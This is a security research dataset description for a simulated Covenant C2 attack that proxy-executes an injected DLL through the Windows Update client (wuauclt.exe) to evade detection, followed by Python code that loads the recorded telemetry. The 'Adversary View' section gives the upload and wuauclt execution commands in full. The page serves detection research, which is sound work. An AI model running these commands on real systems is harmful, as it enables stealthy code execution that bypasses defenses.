Covenant Wuauclt CreateRemoteThread Execution#

Metadata#

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/12

Modification Date

2020/10/12

Tactics

TA0005

Techniques

T1218

Tags

CreateRemoteThread

Dataset Description#

This dataset represents adversaries proxy executing code via the Windows Update client utility. In order to bypass rules looking for the binary reaching out directly to the Internet, this dataset shows the binary creating and running a thread in the virtual address space of another process via the CreateRemoteThread API.

Simulation Metadata#

Tools#

type

Name

Module

C2

Covenant

ShellCmd

Adversary View#

Upload /filepath:"C:\ProgramData\SimpleInjection.dll"

ShellCmd /shellcommand:"C:\Windows\System32\wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\SimpleInjection.dll /RunHandlerComServe"

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_lolbin_wuauclt_createremotethread.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)